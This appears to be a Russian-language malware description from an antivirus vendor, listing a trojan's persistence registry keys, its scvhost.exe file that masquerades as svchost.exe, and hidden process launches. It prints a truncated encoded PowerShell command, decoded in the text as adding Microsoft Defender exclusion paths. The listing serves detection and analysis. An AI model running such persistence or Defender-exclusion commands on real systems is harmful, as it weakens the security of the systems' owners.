Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Store' = '%APPDATA%\scvhost.exe'
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Skype Web' = '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\scvhost.exe'
- %APPDATA%\microsoft\windows\start menu\programs\startup\scvhost.exe
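- %APPDATA%\scvhost.exe (имя имитирует системный svchost.exe, который штатно находится в %WINDIR%\System32, а не в профиле пользователя)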
- %TEMP%\mailify.exe
- %APPDATA%\scvhost.exe в %APPDATA%\ctfmon.exe
- '%APPDATA%\scvhost.exe'
- '%TEMP%\mailify.exe'
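- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGYAaABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...' (со скрытым окном) — видимая часть Base64 (UTF-16LE) декодируется как `<#fhf#>Add-MpPreference <#xrv#> -ExclusionPath @($env:UserProfile,`, то есть команда добавляет пути в исключения Microsoft Defender; продолжение строки на странице обрезано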
- '%APPDATA%\scvhost.exe' (со скрытым окном)
- '%TEMP%\mailify.exe' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "PAAjAGYAaABmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA...